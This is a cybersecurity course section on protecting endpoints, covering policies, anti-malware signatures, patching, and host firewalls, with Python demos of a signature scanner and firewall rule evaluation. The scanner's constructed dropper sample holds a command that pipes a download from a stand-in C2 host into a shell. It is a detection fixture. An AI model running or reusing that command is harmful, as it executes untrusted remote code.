4.3 Protecting Devices
Protecting individual devices, or endpoints, is a critical component of a comprehensive cybersecurity strategy. This is achieved through a combination of managerial policies that guide user behavior and technical controls that harden the devices themselves against attack.
Managerial controls for device security establish clear rules and expectations for users. These policies are crucial for maintaining a consistent security posture across an organization. Key policies include:
- Acceptable Use Policy (AUP): This policy defines what activities are permissible on company-owned devices. It may prohibit users from visiting certain types of websites (like social media), installing unauthorized software, or connecting personal external drives.
- Password Policy: This policy outlines the requirements for user passwords, such as minimum length, complexity rules (requiring a mix of character types), and rules against reusing old passwords. It reinforces the technical settings configured for authentication. Note that current guidance (NIST SP 800-63B) favors length and screening new passwords against lists of known-breached passwords over forced character-type mixes, because complexity rules tend to push users toward predictable patterns; a policy written today should reflect that.
- Software Installation Policy: To prevent the introduction of malware or vulnerable applications, this policy typically restricts users from installing any software on their own. Instead, it establishes a formal process for users to request and receive approved software from the IT department.
In addition to policies, several technical controls are essential for protecting devices. Anti-malware software, also known as antivirus software, is a fundamental tool. It maintains a database of signatures: unique identifiers for known malware, typically cryptographic hashes of whole files or distinctive byte patterns found inside them. The software scans files on the device, both on access and on a schedule, and when a file matches a signature it quarantines or removes that file before it can cause harm. Because a signature only identifies malware that has already been seen, and a small change to a sample can defeat a hash-based signature, the software and its signature database must be kept constantly updated; modern endpoint products also supplement signatures with heuristic and behavioral detection to catch malware that has no signature yet.
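To make the signature mechanism concrete, the following toy scanner is an added example for this section; it is not the course's own code and not a real anti-malware engine. It models the two common signature types (a SHA-256 hash of a whole file, and a byte pattern found inside a file), walks a directory, and moves any hit into a quarantine folder. The marker string, the "dropper" sample, and the file tree it scans are all constructed for the demonstration.

```python
"""Toy signature-based scanner with quarantine.

Added example for this section; not the course's own code and not a real
anti-malware engine. Every signature and every "malware" sample below is
constructed for the demonstration.
"""
from __future__ import annotations

import hashlib
import shutil
import tempfile
from pathlib import Path

# Constructed byte pattern that the example "dropper" family carries.
MARKER = b"EXAMPLE-DROPPER-MARKER-v1"

# Constructed sample body. Its SHA-256 becomes a hash signature; the MARKER
# inside it becomes a pattern signature. c2.invalid is a reserved test name.
DROPPER_BODY = (
    b"#!/bin/sh\n"
    b"# " + MARKER + b"\n"
    b"curl -s http://c2.invalid/payload | sh\n"
)

# Two kinds of signature, as in a real (but vastly larger) signature database.
HASH_SIGNATURES = {hashlib.sha256(DROPPER_BODY).hexdigest(): "Example.Dropper (hash)"}
PATTERN_SIGNATURES = {MARKER: "Example.Dropper (pattern)"}


def match_signatures(data: bytes) -> list[str]:
    """Return the names of every signature that matches the file contents."""
    hits = []
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:          # exact whole-file match
        hits.append(HASH_SIGNATURES[digest])
    for pattern, name in PATTERN_SIGNATURES.items():
        if pattern in data:                # substring match anywhere in the file
            hits.append(name)
    return hits


def scan_and_quarantine(root: Path, quarantine: Path) -> dict[str, list[str]]:
    """Scan every file under root; move detected files into quarantine.

    Returns {path relative to root: [matching signature names]}.
    """
    quarantine.mkdir(parents=True, exist_ok=True)
    findings: dict[str, list[str]] = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        hits = match_signatures(path.read_bytes())   # whole file in memory: toy only
        if hits:
            findings[str(path.relative_to(root))] = hits
            # Rename on the way in so nothing treats the file as executable.
            shutil.move(str(path), str(quarantine / (path.name + ".quarantined")))
    return findings


def build_sample_tree(root: Path) -> None:
    """Constructed inputs: the known sample, a trivially edited variant,
    a variant with the marker stripped out, and a benign file."""
    (root / "known_dropper.sh").write_bytes(DROPPER_BODY)
    (root / "variant_dropper.sh").write_bytes(DROPPER_BODY.replace(b"payload", b"stage2"))
    (root / "repacked_dropper.sh").write_bytes(DROPPER_BODY.replace(b"# " + MARKER + b"\n", b""))
    (root / "notes.txt").write_bytes(b"Quarterly planning notes\n")


def run_demo(base: Path | None = None) -> dict:
    """Build the sample tree in a scratch directory, scan it, report the outcome."""
    base = base or Path(tempfile.mkdtemp(prefix="avdemo-"))
    root, qdir = base / "home", base / "quarantine"
    root.mkdir(parents=True, exist_ok=True)
    build_sample_tree(root)
    findings = scan_and_quarantine(root, qdir)
    return {
        "findings": findings,
        "quarantined": sorted(p.name for p in qdir.iterdir()),
        "remaining": sorted(p.name for p in root.iterdir()),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Running it shows the limits of each signature type: the known sample is caught by both signatures, the variant with one word changed escapes the hash signature and is caught only by the byte pattern, and the "repacked" copy with the marker removed is not detected at all even though it does the same thing. That gap is why the signature database needs constant updates and why real products add heuristic and behavioral detection on top.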
Keeping a device's operating system and all installed software updated is one of the most effective security measures. When a vulnerability is discovered in a piece of software, whether by its developers or by outside researchers, the developers release an update, or patch, to fix it. Public details of the flaw usually accompany or quickly follow the patch, so the window between a patch being released and adversaries exploiting the flaw on unpatched systems is often short. Applying patches promptly closes the security hole before it can be exploited. Many successful attacks target known vulnerabilities for which a patch already exists but was never applied, which is why automatic updates should be enabled wherever the organization can tolerate them.
A host-based firewall provides another important layer of protection. Unlike a network firewall that protects an entire network, a host-based firewall runs on an individual device and controls the traffic entering and leaving that specific device. It operates using an ordered set of rules (an access control list, or ACL) that allow or deny traffic based on port, protocol, remote address, or the local application that owns the connection; the first rule that matches a connection decides its fate, and a default policy applies when nothing matches. A properly configured host-based firewall can block an unauthorized inbound connection to a device even when the device sits on an untrusted or compromised network, such as public Wi-Fi. It can also filter outbound traffic, which can stop malware on the device from reaching an adversary's command and control (C2) server. As a best practice, a host-based firewall should use a default-deny policy in both directions: block every port, service, and outbound destination that is not explicitly needed for the device to perform its function, and keep each allow rule as narrow as possible (a specific port, protocol, program, and address range) rather than opening a port to the whole internet.
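The following model of host-based firewall rule evaluation is an added example for this section, not the course's own material and not a real firewall. It reproduces what nftables- or Windows Firewall-style rule sets do (ordered rules, first match wins, per-direction default policy, matching on port, protocol, remote address, and owning program) and places a weak default-allow configuration beside a hardened default-deny one. It also includes a small lint that flags rules an earlier rule already covers, a common mistake in hand-written ACLs. All rules, program names, and addresses (drawn from the documentation ranges 10.0.0.0/8, 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) are constructed for the demonstration.

```python
"""Host-based firewall rule evaluation, modelled in Python.

Added example for this section; not a real firewall and not the course's own
code. Rules, addresses, programs and sample connections are constructed.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

ALLOW, DENY = "allow", "deny"


@dataclass(frozen=True)
class Connection:
    direction: str  # "in": remote host connects to us; "out": we connect out
    proto: str      # "tcp" or "udp"
    port: int       # destination port (our listener for "in", the remote's for "out")
    remote: str     # remote IP address
    program: str    # local program that owns the socket


@dataclass(frozen=True)
class Rule:
    direction: str
    action: str
    proto: str | None = None     # None = any
    port: int | None = None      # None = any
    remote: str | None = None    # CIDR, None = any
    program: str | None = None   # None = any
    comment: str = ""

    def matches(self, c: Connection) -> bool:
        return (self.direction == c.direction
                and self.proto in (None, c.proto)
                and self.port in (None, c.port)
                and self.program in (None, c.program)
                and (self.remote is None
                     or ipaddress.ip_address(c.remote) in ipaddress.ip_network(self.remote)))

    def covers(self, other: Rule) -> bool:
        """True if every connection that `other` matches, self matches as well."""
        return (self.direction == other.direction
                and self.proto in (None, other.proto)
                and self.port in (None, other.port)
                and self.program in (None, other.program)
                and (self.remote is None
                     or (other.remote is not None and ipaddress.ip_network(other.remote)
                         .subnet_of(ipaddress.ip_network(self.remote)))))


def evaluate(rules: list[Rule], default: dict[str, str], c: Connection) -> tuple[str, str]:
    """First matching rule wins; otherwise the direction's default policy applies."""
    for rule in rules:
        if rule.matches(c):
            return rule.action, rule.comment
    return default[c.direction], "default policy"


def shadowed_rules(rules: list[Rule]) -> list[str]:
    """Lint: rules that can never fire because an earlier rule already covers them."""
    return [later.comment for i, later in enumerate(rules)
            if any(earlier.covers(later) for earlier in rules[:i])]


# Weak configuration: default allow, with a short blocklist of known-bad things.
WEAK_DEFAULT = {"in": ALLOW, "out": ALLOW}
WEAK_RULES = [
    Rule("in", DENY, "tcp", 23, comment="no telnet"),
    Rule("out", DENY, remote="198.51.100.7/32", comment="C2 address seen last month"),
]

# Hardened configuration: default deny, allow only what this host's role needs.
HARD_DEFAULT = {"in": DENY, "out": DENY}
HARD_RULES = [
    Rule("in", ALLOW, "tcp", 22, remote="10.0.0.0/8", program="sshd", comment="ssh from corp net"),
    Rule("out", ALLOW, "udp", 53, remote="10.0.0.53/32", comment="dns to corp resolver"),
    Rule("out", ALLOW, "tcp", 443, program="firefox", comment="browser https"),
    Rule("out", ALLOW, "tcp", 443, program="firefox", remote="10.0.0.0/8", comment="never fires: covered above"),
]

# Constructed sample connections.
SAMPLES = {
    "ssh from corp admin":     Connection("in", "tcp", 22, "10.1.2.3", "sshd"),
    "ssh from the internet":   Connection("in", "tcp", 22, "203.0.113.9", "sshd"),
    "rdp from the internet":   Connection("in", "tcp", 3389, "203.0.113.9", "svchost"),
    "browser to a web site":   Connection("out", "tcp", 443, "198.51.100.20", "firefox"),
    "dns to corp resolver":    Connection("out", "udp", 53, "10.0.0.53", "systemd-resolved"),
    "dns to outside resolver": Connection("out", "udp", 53, "192.0.2.53", "suspicious.exe"),
    "beacon to fresh C2 host": Connection("out", "tcp", 4444, "198.51.100.8", "updater.exe"),
}


def compare() -> dict[str, tuple[str, str]]:
    """(weak decision, hardened decision) for every sample connection."""
    return {name: (evaluate(WEAK_RULES, WEAK_DEFAULT, c)[0],
                   evaluate(HARD_RULES, HARD_DEFAULT, c)[0])
            for name, c in SAMPLES.items()}


if __name__ == "__main__":
    for name, (weak, hard) in compare().items():
        print(f"{name:24} weak={weak:5} hardened={hard}")
    print("shadowed rules:", shadowed_rules(HARD_RULES))
```

The weak set lets every sample through except the one telnet and one stale C2 address it names: the beacon to a new C2 host and the DNS query to an outside resolver are both allowed because a blocklist can only name what is already known. The hardened set needs no knowledge of the attacker at all; it permits exactly the four flows the host's role requires and the default policy denies everything else, including the same beacon and the RDP and SSH attempts from the internet. The lint reports the fourth hardened rule as shadowed, which is the kind of dead rule that accumulates in real firewalls and should be removed or reordered.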